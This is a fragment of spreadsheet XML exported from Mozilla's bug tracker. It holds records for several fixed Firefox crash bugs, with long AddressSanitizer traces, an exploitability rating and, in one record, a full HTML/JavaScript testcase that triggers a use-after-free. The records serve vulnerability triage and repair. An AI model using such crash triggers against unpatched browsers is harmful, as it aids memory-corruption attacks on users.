      <c r="M3080" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3080" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3080" t="inlineStr">
        <is>
          <t>[asan][sg:critical][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q3080" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3080" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3080" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3080" t="n">
        <v>1</v>
      </c>
      <c r="U3080" t="n">
        <v>0</v>
      </c>
      <c r="V3080" t="n">
        <v>30</v>
      </c>
      <c r="W3080" t="inlineStr">
        <is>
          <t>Created attachment 619397
Load testcase and resize browser window to reproduce
Reproduces on ASANified aurora, trunk. Load attached testcase and resize browser window to reproduce crash.
=================================================================
==27281== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f188f6581b4 at pc 0x7f18b95a4375 bp 0x7fffcea2e310 sp 0x7fffcea2e308
READ of size 4 at 0x7f188f6581b4 thread T0
    #0 0x7f18b95a4375 in nsLineBox::Contains(nsIFrame*) const firefox/aurora/layout/generic/nsLineBox.h:547
    #1 0x7f18b95cb325 in nsBlockInFlowLineIterator firefox/aurora/layout/generic/nsBlockFrame.cpp:5261
    #2 0x7f18b983b03f in nsHTMLReflowState::CalculateHypotheticalBox(nsPresContext*, nsIFrame*, nsIFrame*, int, int, nsHTMLReflowState const*, nsHypotheticalBox&amp;, nsIAtom*) firefox/aurora/layout/generic/nsHTMLReflowState.cpp:987
    #3 0x7f18b984058e in nsHTMLReflowState::InitAbsoluteConstraints(nsPresContext*, nsHTMLReflowState const*, int, int, nsIAtom*) firefox/aurora/layout/generic/nsHTMLReflowState.cpp:1186
    #4 0x7f18b9831ec4 in nsHTMLReflowState::InitConstraints(nsPresContext*, int, int, nsMargin const*, nsMargin const*, nsIAtom*) firefox/aurora/layout/generic/nsHTMLReflowState.cpp:1878
    #5 0x7f18b98280af in nsHTMLReflowState::Init(nsPresContext*, int, int, nsMargin const*, nsMargin const*) firefox/aurora/layout/generic/nsHTMLReflowState.cpp:291
    #6 0x7f18b9829d49 in nsHTMLReflowState firefox/aurora/layout/generic/nsHTMLReflowState.cpp:180
    #7 0x7f18b954974b in nsAbsoluteContainingBlock::ReflowAbsoluteFrame(nsIFrame*, nsPresContext*, nsHTMLReflowState const&amp;, int, int, bool, nsIFrame*, unsigned int&amp;, nsOverflowAreas*) firefox/aurora/layout/generic/nsAbsoluteContainingBlock.cpp:424
    #8 0x7f18b9546006 in nsAbsoluteContainingBlock::Reflow(nsContainerFrame*, nsPresContext*, nsHTMLReflowState const&amp;, unsigned int&amp;, int, int, bool, bool, bool, nsOverflowAreas*) firefox/aurora/layout/generic/nsAbsoluteContainingBlock.cpp:158
    #9 0x7f18b95617bb in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1207
    #10 0x7f18b95f1b7b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockReflowContext.cpp:295
    #11 0x7f18b9591a4f in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:3202
    #12 0x7f18b95872b6 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:2511
    #13 0x7f18b956c871 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:2022
    #14 0x7f18b955ffcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1071
    #15 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #16 0x7f18b9634445 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:710
    #17 0x7f18b963b6c7 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:965
    #18 0x7f18b95f1b7b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockReflowContext.cpp:295
    #19 0x7f18b9591a4f in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:3202
    #20 0x7f18b95872b6 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:2511
    #21 0x7f18b956c871 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:2022
    #22 0x7f18b955ffcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1071
    #23 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #24 0x7f18b9634445 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:710
    #25 0x7f18b963b6c7 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:965
    #26 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #27 0x7f18b981e4ec in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsCanvasFrame.cpp:461
    #28 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #29 0x7f18b979c723 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) firefox/aurora/layout/generic/nsGfxScrollFrame.cpp:559
    #30 0x7f18b97a21ba in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) firefox/aurora/layout/generic/nsGfxScrollFrame.cpp:659
    #31 0x7f18b97a652f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsGfxScrollFrame.cpp:900
    #32 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #33 0x7f18b9b72706 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsViewportFrame.cpp:230
    #34 0x7f18b92dcb59 in PresShell::DoReflow(nsIFrame*, bool) firefox/aurora/layout/base/nsPresShell.cpp:7608
    #35 0x7f18b92d941f in PresShell::ResizeReflowIgnoreOverride(int, int) firefox/aurora/layout/base/nsPresShell.cpp:2036
    #36 0x7f18b92da50a in PresShell::ResizeReflow(int, int) firefox/aurora/layout/base/nsPresShell.cpp:1971
    #37 0x7f18bc8b1f4a in nsViewManager::DoSetWindowDimensions(int, int) firefox/aurora/view/src/nsViewManager.cpp:243
    #38 0x7f18bc8b28ed in nsViewManager::SetWindowDimensions(int, int) firefox/aurora/view/src/nsViewManager.cpp:263
    #39 0x7f18b912d7f1 in DocumentViewerImpl::SetBounds(nsIntRect const&amp;) firefox/aurora/layout/base/nsDocumentViewer.cpp:1928
    #40 0x7f18c01e6cec in nsDocShell::SetPositionAndSize(int, int, int, int, bool) firefox/aurora/docshell/base/nsDocShell.cpp:4739
    #41 0x7f18c01e73a7 in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, bool) firefox/aurora/modules/zlib/src/gzlib.c:0
    #42 0x7f18bac83ba1 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsIFrame*) firefox/aurora/content/base/src/nsFrameLoader.cpp:1699
    #43 0x7f18bac8310e in nsFrameLoader::UpdatePositionAndSize(nsIFrame*) firefox/aurora/content/base/src/nsFrameLoader.cpp:1672
    #44 0x7f18b9a25d35 in nsSubDocumentFrame::ReflowFinished() firefox/aurora/layout/generic/nsSubDocumentFrame.cpp:648
    #45 0x7f18b9a25ebc in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() firefox/aurora/modules/zlib/src/gzlib.c:0
    #46 0x7f18b9307109 in PresShell::HandlePostedReflowCallbacks(bool) firefox/aurora/layout/base/nsPresShell.cpp:3840
    #47 0x7f18b92de439 in PresShell::DidDoReflow(bool) firefox/aurora/layout/base/nsPresShell.cpp:7448
    #48 0x7f18b92d9452 in PresShell::ResizeReflowIgnoreOverride(int, int) firefox/aurora/layout/base/nsPresShell.cpp:2040
    #49 0x7f18b92da50a in PresShell::ResizeReflow(int, int) firefox/aurora/layout/base/nsPresShell.cpp:1971
    #50 0x7f18bc8b1f4a in nsViewManager::DoSetWindowDimensions(int, int) firefox/aurora/view/src/nsViewManager.cpp:243
    #51 0x7f18bc8b28ed in nsViewManager::SetWindowDimensions(int, int) firefox/aurora/view/src/nsViewManager.cpp:263
    #52 0x7f18bc8bb81d in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) firefox/aurora/view/src/nsViewManager.cpp:680
    #53 0x7f18bc8a5164 in HandleEvent(nsGUIEvent*) firefox/aurora/view/src/nsView.cpp:159
    #54 0x7f18c19d195a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) firefox/aurora/widget/gtk2/nsWindow.cpp:523
    #55 0x7f18c19d0cda in nsWindow::DispatchResizeEvent(nsIntRect&amp;, nsEventStatus&amp;) firefox/aurora/widget/gtk2/nsWindow.cpp:481
    #56 0x7f18c19e30c3 in nsWindow::Resize(int, int, int, int, bool) firefox/aurora/widget/gtk2/nsWindow.cpp:1178
    #57 0x7f18b912d58b in DocumentViewerImpl::SetBounds(nsIntRect const&amp;) firefox/aurora/layout/base/nsDocumentViewer.cpp:1921
    #58 0x7f18c01e6cec in nsDocShell::SetPositionAndSize(int, int, int, int, bool) firefox/aurora/docshell/base/nsDocShell.cpp:4739
    #59 0x7f18c01e73a7 in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, bool) firefox/aurora/modules/zlib/src/gzlib.c:0
    #60 0x7f18c0703e4b in nsWebShellWindow::HandleEvent(nsGUIEvent*) firefox/aurora/xpfe/appshell/src/nsWebShellWindow.cpp:347
    #61 0x7f18c19d195a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) firefox/aurora/widget/gtk2/nsWindow.cpp:523
    #62 0x7f18c19d0cda in nsWindow::DispatchResizeEvent(nsIntRect&amp;, nsEventStatus&amp;) firefox/aurora/widget/gtk2/nsWindow.cpp:481
    #63 0x7f18c19fdd4b in nsWindow::OnSizeAllocate(_GtkWidget*, _GdkRectangle*) firefox/aurora/widget/gtk2/nsWindow.cpp:2423
0x7f188f6581b4 is located 20 bytes to the right of 32-byte region [0x7f188f658180,0x7f188f6581a0)
allocated by thread T0 here:
    #0 0x4a4332 in malloc ??:0
    #1 0x7f18cf2747c7 in moz_xmalloc firefox/aurora/memory/mozalloc/mozalloc.cpp:87
    #2 0x7f18b95a26fb in nsBlockFrame::PushLines(nsBlockReflowState&amp;, nsLineList_iterator) firefox/aurora/layout/generic/nsBlockFrame.cpp:4410
    #3 0x7f18b95b1d2c in nsBlockFrame::PlaceLine(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, nsRect&amp;, int&amp;, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:4321
    #4 0x7f18b95a837e in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/aurora/layout/generic/nsBlockFrame.cpp:3760
    #5 0x7f18b9598f47 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:3478
    #6 0x7f18b958775c in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:2567
    #7 0x7f18b956fbea in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:2307
    #8 0x7f18b955ffcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1071
    #9 0x7f18b95f1b7b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockReflowContext.cpp:295
    #10 0x7f18b9591a4f in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:3202
    #11 0x7f18b95872b6 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:2511
    #12 0x7f18b956c871 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:2022
    #13 0x7f18b955ffcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1071
    #14 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
    #15 0x7f18b9634445 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:710
    #16 0x7f18b963b6c7 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsColumnSetFrame.cpp:965
    #17 0x7f18b95f1b7b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockReflowContext.cpp:295
    #18 0x7f18b9591a4f in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:3202
    #19 0x7f18b95872b6 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/aurora/layout/generic/nsBlockFrame.cpp:2511
    #20 0x7f18b956c871 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:2022
    #21 0x7f18b955ffcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/aurora/layout/generic/nsBlockFrame.cpp:1071
    #22 0x7f18b9652fa7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/aurora/layout/generic/nsContainerFrame.cpp:940
==27281== ABORTING
Stats: 140M malloced (154M for red zones) by 338742 calls
Stats: 42M realloced by 19009 calls
Stats: 118M freed by 232563 calls
Stats: 0M really freed by 0 calls
Stats: 328M (84015 full pages) mmaped in 82 calls
  mmaps   by size class: 8:278511; 9:49146; 10:16380; 11:16376; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:112; 19:56; 20:16;
  mallocs by size class: 8:255876; 9:45163; 10:15510; 11:15570; 12:2378; 13:1737; 14:1416; 15:299; 16:521; 17:108; 18:100; 19:50; 20:14;
  frees   by size class: 8:164067; 9:36673; 10:13283; 11:13080; 12:1703; 13:1568; 14:1236; 15:256; 16:456; 17:95; 18:89; 19:46; 20:11;
  rfrees  by size class:
Stats: malloc large: 272 small slow: 1772
Shadow byte and word:
  0x1fe311ecb036: fb
  0x1fe311ecb030: 00 00 00 00 fb fb fb fb
More shadow bytes:
  0x1fe311ecb010: 00 00 00 00 00 00 00 fb
  0x1fe311ecb018: fb fb fb fb fb fb fb fb
  0x1fe311ecb020: fa fa fa fa fa fa fa fa
  0x1fe311ecb028: fa fa fa fa fa fa fa fa
=&gt;0x1fe311ecb030: 00 00 00 00 fb fb fb fb
  0x1fe311ecb038: fb fb fb fb fb fb fb fb
  0x1fe311ecb040: fa fa fa fa fa fa fa fa
  0x1fe311ecb048: fa fa fa fa fa fa fa fa
  0x1fe311ecb050: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X3080" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3081">
      <c r="A3081" t="n">
        <v>490513</v>
      </c>
      <c r="B3081" t="inlineStr">
        <is>
          <t>2009-04-28 11:14:42 -0700</t>
        </is>
      </c>
      <c r="C3081" t="inlineStr">
        <is>
          <t>Shutdown crash [@ PL_DHashTableFinish] with high surrogate in &lt;style&gt;</t>
        </is>
      </c>
      <c r="D3081" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E3081" t="n">
        <v>1</v>
      </c>
      <c r="F3081" t="n">
        <v>1</v>
      </c>
      <c r="G3081" t="n">
        <v>3</v>
      </c>
      <c r="H3081" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3081" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3081" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3081" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L3081" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3081" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3081" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3081" t="inlineStr">
        <is>
          <t>[sg:critical?] 1.9.0 branch</t>
        </is>
      </c>
      <c r="Q3081" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3081" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3081" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3081" t="n">
        <v>1</v>
      </c>
      <c r="U3081" t="n">
        <v>0</v>
      </c>
      <c r="V3081" t="n">
        <v>14</v>
      </c>
      <c r="W3081" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #439206 +++
Created an attachment (id=325076)
testcase (makes Firefox crash on shutdown)
==
This bug is marked fixed on 1.9.0 but it still crashes for me on winxp with 
dom/base/crashtests/439206-1.html (from trunk)
1.9.0 !exploitable report
PROBABLY_EXPLOITABLE: Probably Exploitable - Data from Faulting Address controls Code Flow starting at xpcom_core!AtomTableClearEntry</t>
        </is>
      </c>
      <c r="X3081" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3082">
      <c r="A3082" t="n">
        <v>1445524</v>
      </c>
      <c r="B3082" t="inlineStr">
        <is>
          <t>2018-03-13 18:28:44 -0700</t>
        </is>
      </c>
      <c r="C3082" t="inlineStr">
        <is>
          <t>Crash in doLoadFromCommonData</t>
        </is>
      </c>
      <c r="D3082" t="inlineStr">
        <is>
          <t>2018-05-24 08:44:56 -0700</t>
        </is>
      </c>
      <c r="E3082" t="n">
        <v>1</v>
      </c>
      <c r="F3082" t="n">
        <v>1</v>
      </c>
      <c r="G3082" t="n">
        <v>3</v>
      </c>
      <c r="H3082" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3082" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3082" t="inlineStr">
        <is>
          <t>JavaScript: Internationalization API</t>
        </is>
      </c>
      <c r="K3082" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3082" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3082" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3082" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3082" t="inlineStr"/>
      <c r="Q3082" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3082" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3082" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T3082" t="n">
        <v>1</v>
      </c>
      <c r="U3082" t="n">
        <v>0</v>
      </c>
      <c r="V3082" t="n">
        <v>18</v>
      </c>
      <c r="W3082" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-589b7799-eb31-40a4-bd7d-c44e30180313.
=============================================================
Seen while looking at early 59 Mac crash stats: http://bit.ly/2FIb1zx. This is a startup crash which has 17 crashes/17 installs so far. Although there appears to have been a similar signature in 58.0.2, the stack does look different.
All of the crashes have the same crash reason: EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
I guessed on the component - perhaps someone can bucket this in a better place if it doesn't belong here.
Top 10 frames of crashing thread:
0 XUL doLoadFromCommonData intl/icu/source/common/udata.cpp:952
1 XUL doOpenChoice intl/icu/source/common/udata.cpp:1330
2 XUL icu_60::LoadedNormalizer2Impl::load intl/icu/source/common/loadednormalizer2impl.cpp:80
3 XUL icu_60::Normalizer2::getInstance intl/icu/source/common/loadednormalizer2impl.cpp:126
4 XUL uidna_openUTS46_60 intl/icu/source/common/uts46.cpp:219
5 XUL nsIDNService::nsIDNService netwerk/dns/nsIDNService.cpp:153
6 XUL nsIDNServiceConstructor netwerk/build/nsNetModule.cpp:381
7 XUL nsComponentManagerImpl::CreateInstanceByContractID xpcom/components/nsComponentManager.cpp:1086
8 XUL nsComponentManagerImpl::GetServiceByContractID xpcom/components/nsComponentManager.cpp:1446
9 XUL nsGetServiceByContractID::operator const xpcom/components/nsComponentManagerUtils.cpp:67
=============================================================</t>
        </is>
      </c>
      <c r="X3082" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3083">
      <c r="A3083" t="n">
        <v>775228</v>
      </c>
      <c r="B3083" t="inlineStr">
        <is>
          <t>2012-07-18 12:28:24 -0700</t>
        </is>
      </c>
      <c r="C3083" t="inlineStr">
        <is>
          <t>use-after-free when loading html file on osx</t>
        </is>
      </c>
      <c r="D3083" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:46 -0700</t>
        </is>
      </c>
      <c r="E3083" t="n">
        <v>1</v>
      </c>
      <c r="F3083" t="n">
        <v>1</v>
      </c>
      <c r="G3083" t="n">
        <v>3</v>
      </c>
      <c r="H3083" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3083" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3083" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3083" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3083" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3083" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3083" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3083" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q3083" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3083" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3083" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T3083" t="n">
        <v>1</v>
      </c>
      <c r="U3083" t="n">
        <v>0</v>
      </c>
      <c r="V3083" t="n">
        <v>42</v>
      </c>
      <c r="W3083" t="inlineStr">
        <is>
          <t>Created attachment 643508
repro, asan log, crashwrangler logs.
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Steps to reproduce:
loaded:
&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;
      #el0 { -moz-perspective: 1px; } 
      #el1 { -moz-transform: rotateY(1deg); } 
      #el2 { width: 40000; } 
    &lt;/style&gt;
    &lt;script&gt; 
      onload = function() {
        el0=document.createElement('div') 
        el0.setAttribute('id','el0') 
        document.body.appendChild(el0) 
        el1=document.createElement('tr') 
        el1.setAttribute('id','el1') 
        el0.appendChild(el1) 
        el2=document.createElement('input') 
        el2.setAttribute('id','el2') 
        el1.appendChild(el2) 
        document.body.offsetTop
        setTimeout(function() {
          window.open(document.location)
        },2000)
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
Actual results:
asan said:
==18953== ERROR: AddressSanitizer heap-use-after-free on address 0x000131e9d480 at pc 0x106e8cecc bp 0x7fff5fbeead0 sp 0x7fff5fbeeac8
READ of size 8 at 0x000131e9d480 thread T0
    #0 0x106e8cecc in _ZN7mozilla6layersL15PixmanTransformEPK15gfxImageSurfaceS3_RK11gfx3DMatrix8gfxPoint (in XUL) + 764
    #1 0x106e8b1c6 in _ZN7mozilla6layersL11Transform3DEP11gfxASurfaceP10gfxContextRK7gfxRectRK11gfx3DMatrixR8gfxPointb (in XUL) + 1990
    #2 0x106e8a236 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) (in XUL) + 5254
    #3 0x106e89e6f in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void 
0x000131e9d480 is located 0 bytes inside of 72-byte region [0x000131e9d480,0x000131e9d4c8)
freed by thread T0 here:
    #0 0x10000d095 in (anonymous namespace)::mz_free(_malloc_zone_t*, void*) (in firefox) + 85
    #1 0x10000cb10 in wrap_free (in firefox) + 80
    #2 0x106df1a46 in gfxASurface::Release() (in XUL) + 310
    #3 0x106e70557 in gfxQuartzSurface::GetAsImageSurface() (in XUL) + 343
    #4 0x106e8abd2 in 
Expected results:
:D</t>
        </is>
      </c>
      <c r="X3083" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3084">
